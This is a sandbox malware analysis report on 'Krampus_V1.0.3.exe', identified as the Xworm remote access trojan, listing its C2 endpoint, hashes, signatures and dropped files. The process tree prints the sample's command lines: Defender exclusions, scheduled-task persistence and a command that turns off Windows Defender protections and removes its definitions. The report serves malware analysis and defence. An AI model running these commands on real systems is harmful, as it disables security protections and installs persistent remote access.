Overview

overview

10

Static

static

3

Krampus_V1.0.3.exe

windows7-x64

10

Krampus_V1.0.3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/04/2024, 23:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Krampus_V1.0.3.exe

  • Size

    7.6MB

  • MD5

    8720aba46da0b8648491f6d074647618

  • SHA1

    ab1e7f51c8dd4e686d498a394c184339fefc10cc

  • SHA256

    67346337782fbd66c3b5f77e9a873a5078f5936625848ebee8b592c715daf7f3

  • SHA512

    095596fcfdca3f9141c13e41a39ed0e59486d1d3824b14de6639af6ed32e634ef0fad6f4d50fc5a184059d5897d440e86a082d9b944b7b01a9a6bdbde9f066ac

  • SSDEEP

    196608:NMt+dnIdHWxdKHoYOeXRihlWu8YgoPIM:NMt+uoxmomX8hlzgOIM

Score
10/10
xwormpersistencerattrojanupx

Malware Config

Extracted

Family

xworm

C2

north-untitled.gl.at.ply.gg:29298

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    discord.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 17 IoCs
  • UPX packed file 42 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Krampus_V1.0.3.exe
    "C:\Users\Admin\AppData\Local\Temp\Krampus_V1.0.3.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:4068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\test.bat'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4896
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\test.bat" "
      2⤵
        PID:3512
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\XClient.exe'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:644
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "XClient" /SC ONLOGON /TR "C:\Windows\System32\XClient.exe" /RL HIGHEST
        2⤵
        • Creates scheduled task(s)
        PID:4984
      • C:\Windows\System32\XClient.exe
        "C:\Windows\System32\XClient.exe"
        2⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2344
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\XClient.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2388
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\discord.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\discord.exe"
          3⤵
          • Creates scheduled task(s)
          PID:4768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1924
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST
        2⤵
        • Creates scheduled task(s)
        PID:5088
      • C:\Windows\System32\Built.exe
        "C:\Windows\System32\Built.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4472
        • C:\Windows\System32\Built.exe
          "C:\Windows\System32\Built.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:3792
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:928
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3088
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5004
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4984
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3368
    • C:\Users\Admin\discord.exe
      C:\Users\Admin\discord.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4992
    • C:\Users\Admin\discord.exe
      C:\Users\Admin\discord.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:464
    • C:\Users\Admin\discord.exe
      C:\Users\Admin\discord.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2228

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\discord.exe.log
      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      cae60f0ddddac635da71bba775a2c5b4

      SHA1

      386f1a036af61345a7d303d45f5230e2df817477

      SHA256

      b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

      SHA512

      28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      83685d101174171875b4a603a6c2a35c

      SHA1

      37be24f7c4525e17fa18dbd004186be3a9209017

      SHA256

      0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

      SHA512

      005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      34f595487e6bfd1d11c7de88ee50356a

      SHA1

      4caad088c15766cc0fa1f42009260e9a02f953bb

      SHA256

      0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

      SHA512

      10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      04f1d68afbed6b13399edfae1e9b1472

      SHA1

      8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

      SHA256

      f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

      SHA512

      30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      62623d22bd9e037191765d5083ce16a3

      SHA1

      4a07da6872672f715a4780513d95ed8ddeefd259

      SHA256

      95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

      SHA512

      9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      6f3b96b24f06e2d37a46e43e8b784f56

      SHA1

      7be6702c5867f359e913eeeecdd5b76698589295

      SHA256

      8e386afeed28e1d282d9a0294dd2e9402dcb807f7c77aca8426314c20057e720

      SHA512

      d760999531a77a9adf2b4dc019ce3b43ac3a8cad825398b3a09818afe8deaa177d37219a26dd8a432c00c9cff7858efc43cae2375edc996bb0136c92c39c9dfb

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\VCRUNTIME140.dll
      Filesize

      116KB

      MD5

      be8dbe2dc77ebe7f88f910c61aec691a

      SHA1

      a19f08bb2b1c1de5bb61daf9f2304531321e0e40

      SHA256

      4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

      SHA512

      0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_bz2.pyd
      Filesize

      48KB

      MD5

      6c57219d7f69eee439d7609ab9cc09e7

      SHA1

      52e8abbc41d34aa82388b54b20925ea2fcca2af8

      SHA256

      8e389c056a6cf8877ddf09a1ae53d1a1b1de71a32b437d992ec8195c3c8eda92

      SHA512

      801f5b3f15e25f3be3f7ece512ffa561c97d43fff465e8fcb8afc92a94fd0bd3ec57c3e4df775beb1a6357064fad2be2ab6345bb8fe8c9b00674ade546bf6bc3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_ctypes.pyd
      Filesize

      58KB

      MD5

      ee77573f4335614fc1dc05e8753d06d9

      SHA1

      9c78e7ce0b93af940749295ec6221f85c04d6b76

      SHA256

      20bc81c1b70f741375751ae7c4a177a409b141bfcd32b4267975c67fc1b11e87

      SHA512

      c87c9c68cb428c2305076545702e602c8119bb1c4b003fc077fc99a7b0f6ffd12cafdd7ff56dac5d150785adc920d92ea527067c8fec3c4a16737f11d23d4875

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_decimal.pyd
      Filesize

      106KB

      MD5

      787f57b9a9a4dbc0660041d5542f73e2

      SHA1

      219f2cdb825c7857b071d5f4397f2dbf59f65b32

      SHA256

      d5646447436daca3f6a755e188ea15932ae6b5ba8f70d9c1de78f757d310d300

      SHA512

      cd06ea22530c25d038f8d9e3cc54d1fdbc421fb7987ab6ebc5b665ae86a73b39a131daef351420f1b1cb522002388c4180c8f92d93ea15460ccba9029cac7eef

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_hashlib.pyd
      Filesize

      35KB

      MD5

      ff0042b6074efa09d687af4139b80cff

      SHA1

      e7483e6fa1aab9014b309028e2d31c9780d17f20

      SHA256

      e7ddac4d8f099bc5ebcb5f4a9de5def5be1fc62ecca614493e8866dc6c60b2ce

      SHA512

      0ff0178f7e681a7c138bfd32c1276cf2bd6fbeb734139b666f02a7f7c702a738abdbc9dddcf9ab991dead20ec3bf953a6c5436f8640e73bdd972c585937fa47a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_lzma.pyd
      Filesize

      86KB

      MD5

      58b19076c6dfb4db6aa71b45293f271c

      SHA1

      c178edc7e787e1b485d87d9c4a3ccfeadeb7039e

      SHA256

      eff1a7fc55efe2119b1f6d4cf19c1ec51026b23611f8f9144d3ef354b67ff4d5

      SHA512

      f4305dcc2024a0a138d997e87d29824c088f71322021f926e61e3136a66bea92f80bce06345307935072a3e973255f9bbae18a90c94b80823fbc9a3a11d2b2f4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_queue.pyd
      Filesize

      25KB

      MD5

      e8f45b0a74ee548265566cbae85bfab8

      SHA1

      24492fcd4751c5d822029759dec1297ff31ae54a

      SHA256

      29e7801c52b5699d13a1d7b95fd173d4a45ab2791377ac1f3095d5edc8eba4bd

      SHA512

      5861a0606e2c2c2ebb3d010b4591e4f44e63b9dbfa59f8bb4ac1cda4fbfdcb969864601dee6b23d313fe8706819346cfbcd67373e372c7c23260b7277ee66fbf

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_socket.pyd
      Filesize

      43KB

      MD5

      6ef6bcbb28b66b312ab7c30b1b78f3f3

      SHA1

      ca053c79ce7ea4b0ec60eff9ac3e8dd8ba251539

      SHA256

      203daa59e7bf083176cbfcc614e3bac09da83d1d09ef4fcd151f32b96499d4b2

      SHA512

      bec35443715f98ee42fda3697c2009c66d79b1170714ea6dedde51205b64a845194fe3786702e04c593059ee4ad4bbfa776fbc130a3400a4a995172675b3dfa9

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_sqlite3.pyd
      Filesize

      56KB

      MD5

      467bcfb26fe70f782ae3d7b1f371e839

      SHA1

      0f836eb86056b3c98d7baf025b37d0f5fe1a01a5

      SHA256

      6015c657b94e008e85f930d686634d2cafa884fd8943207ee759bc3a104c0f48

      SHA512

      19362aa94e6e336fd02f1f60fde9c032a45315f7973a1e597761ae3b49b916aecd89934b8ed33ee85fd53e150a708a4f8f2a25683fb15491daa8430c87a6511c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_ssl.pyd
      Filesize

      65KB

      MD5

      96af7b0462af52a4d24b3f8bc0db6cd5

      SHA1

      2545bb454d0a972f1a7c688e2a5cd41ea81d3946

      SHA256

      23c08f69e5eaa3a4ab9cab287d7dc2a40aca048c8b3c89992cdb62d4de6eb01f

      SHA512

      2a8ed5a4143b3176e96d220f0255da32a139909dd49625ef839c2dfce46e45f11a0b7340eb60ad1f815a455333e45aece6e0d47a8b474419e3cbbbd46f01c062

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\base_library.zip
      Filesize

      1.4MB

      MD5

      6e706e4fa21d90109df6fce1b2595155

      SHA1

      5328dd26b361d36239facff79baca1bab426de68

      SHA256

      ce9b9f16ce0d9abdbac3307115d91eaf279c5152336ccbe8830151b41c802998

      SHA512

      c7e377e2854ad5b5c3fb23593817ad6345bf8a78d842ff2a45c3be135fad6bb27b67c5b6c01b26e7c1b1b12ea0814f4f6b6a522bbfa689b89fa50d3652799b34

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\blank.aes
      Filesize

      116KB

      MD5

      0134453c3b7f0badd5c9007c02952f2e

      SHA1

      abf4176d4519177bb537189b69105f9ed193a3f9

      SHA256

      31b8bfb109e13b4487987c9e96ffbca438b466afe7087305e9ecafe2e928a68f

      SHA512

      38ba9f199f12a4dd8915996ed014569101331d8d76e8d2e8b60fffe6ff852bd5191c67009de7375fa1d8bd50f10e82fb006424ef820810c92e6177c5f31e2b69

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\libcrypto-3.dll
      Filesize

      1.6MB

      MD5

      7f1b899d2015164ab951d04ebb91e9ac

      SHA1

      1223986c8a1cbb57ef1725175986e15018cc9eab

      SHA256

      41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

      SHA512

      ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\libffi-8.dll
      Filesize

      29KB

      MD5

      08b000c3d990bc018fcb91a1e175e06e

      SHA1

      bd0ce09bb3414d11c91316113c2becfff0862d0d

      SHA256

      135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

      SHA512

      8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\libssl-3.dll
      Filesize

      222KB

      MD5

      264be59ff04e5dcd1d020f16aab3c8cb

      SHA1

      2d7e186c688b34fdb4c85a3fce0beff39b15d50e

      SHA256

      358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

      SHA512

      9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\python311.dll
      Filesize

      1.6MB

      MD5

      b167b98fc5c89d65cb1fa8df31c5de13

      SHA1

      3a6597007f572ea09ed233d813462e80e14c5444

      SHA256

      28eda3ba32f5247c1a7bd2777ead982c24175765c4e2c1c28a0ef708079f2c76

      SHA512

      40a1f5cd2af7e7c28d4c8e327310ea1982478a9f6d300950c7372634df0d9ad840f3c64fe35cc01db4c798bd153b210c0a8472ae0898bebf8cf9c25dd3638de8

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\rar.exe
      Filesize

      615KB

      MD5

      9c223575ae5b9544bc3d69ac6364f75e

      SHA1

      8a1cb5ee02c742e937febc57609ac312247ba386

      SHA256

      90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

      SHA512

      57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\rarreg.key
      Filesize

      456B

      MD5

      4531984cad7dacf24c086830068c4abe

      SHA1

      fa7c8c46677af01a83cf652ef30ba39b2aae14c3

      SHA256

      58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

      SHA512

      00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\select.pyd
      Filesize

      25KB

      MD5

      d76b7f6fd31844ed2e10278325725682

      SHA1

      6284b72273be14d544bb570ddf180c764cde2c06

      SHA256

      e46d0c71903db7d735cc040975bfc480dfea34b31b3e57b7dafa4c1f4058e969

      SHA512

      943ca5600f37cf094e08438e1f93b869f108abd556785e5d090051ed8cf003e85c1b380fc95f95bc871db59ffdd61099efa2e32d4354ca0cc70a789cf84abaa1

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\sqlite3.dll
      Filesize

      630KB

      MD5

      73b763cedf2b9bdcb0691fb846894197

      SHA1

      bf2a9e88fba611c2e779ead1c7cfd10d7f4486b2

      SHA256

      e813695191510bf3f18073491dc0ea1b760bc22c334eefe0e97312810de5d8d5

      SHA512

      617cb2b6027a3aba009bb9946347c4e282dd50d38ca4764e819631feb3a7fd739fd458e67866f9f54b33b07645ca55229030860a4faab5f677866cfa4a1f7ee2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\unicodedata.pyd
      Filesize

      295KB

      MD5

      6873de332fbf126ddb53b4a2e33e35a5

      SHA1

      93748c90cd93fda83fcd5bb8187eeaf6b67a2d08

      SHA256

      f5631d92e9da39a6a1e50899d716eac323829d423a7f7fa21bd5061232564370

      SHA512

      0e03ba8c050aeadf88c390e5ea5e8e278f873885c970b67d5bc0675d782233a2925e753dae151c7af9976f64c42eba04a4dcec86204e983f6f6f2788a928401c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbuujikv.tis.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Windows\System32\Built.exe
      Filesize

      7.4MB

      MD5

      7e312ac869e50b5847ff56eab59567d2

      SHA1

      3bcefc87de994260931ac94760e6b478696048be

      SHA256

      5a77b59bd2f5486fbb176fe7c7e8cc478419247c142e5ea7db8d14966bccb5af

      SHA512

      fb9a3658a636644d2df12c2ca1d6f399c84e571491a0dab888d798e5b9ccfb648e077cb90dfbffd5ad24f85441fafc1bb887b160263a2d53577c5db1adf892ee

      Download Submit

    • C:\Windows\System32\XClient.exe
      Filesize

      242KB

      MD5

      7bd5abbfcd57e7565e7778bf1157b816

      SHA1

      a5785d5dae2bb92978f277a4f68e7e682ac4834b

      SHA256

      6b7bfe55c3d4223bb868889fd56c5518fbc3784f6f1d96605c38943cfe004a85

      SHA512

      d8ad281a2e8a8c4d84d90f2b7d57846733889c280ceccfa20c2a0053e7dfc16a1783621942b0e1032e5b273fe4bec1a0627c52831128eff878a15f2b84eddfdf

      Download Submit

    • C:\Windows\System32\test.bat
      Filesize

      435B

      MD5

      40f36b839af3aad8887e3cfe758efab8

      SHA1

      2d60ce25bf47ce4c4969cd73bd204491a3e2d18e

      SHA256

      c9650c17cca714b78e175479a9d9bcf2b6d01629d00418fc2f2b9167563ecb1d

      SHA512

      13ee91dde3b5c6920fc94df15e1d37f66f009a3b5d770fc747d7000a8c4d5091dddaf642b3f1edf01e3ac7f63b652576525401a801c6e4f7621860070f667f8c

      Download Submit

    • memory/644-26-0x000001BA6F640000-0x000001BA6F650000-memory.dmp

      Filesize

      64KB

      Download

    • memory/644-27-0x000001BA6F640000-0x000001BA6F650000-memory.dmp

      Filesize

      64KB

      Download

    • memory/644-39-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/644-24-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1396-276-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1876-264-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1876-261-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1876-262-0x000001B8F6280000-0x000001B8F6290000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1924-55-0x000001E1FA900000-0x000001E1FA910000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1924-56-0x000001E1FA900000-0x000001E1FA910000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1924-68-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1924-54-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2344-165-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2344-52-0x0000000000500000-0x0000000000542000-memory.dmp

      Filesize

      264KB

      Download

    • memory/2344-214-0x000000001B3B0000-0x000000001B3C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2344-265-0x000000001B3B0000-0x000000001B3C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2344-53-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2388-250-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2388-246-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2388-247-0x000001C1F51E0000-0x000001C1F51F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2388-248-0x000001C1F51E0000-0x000001C1F51F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3088-213-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3088-207-0x0000028D759D0000-0x0000028D759E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3088-202-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3368-182-0x00000226BDC60000-0x00000226BDC70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3368-212-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3368-203-0x00007FFB1EAC0000-0x00007FFB1F581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3368-183-0x00000226BDC60000-0x00000226BDC70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3792-143-0x00007FFB20900000-0x00007FFB20919000-memory.dmp

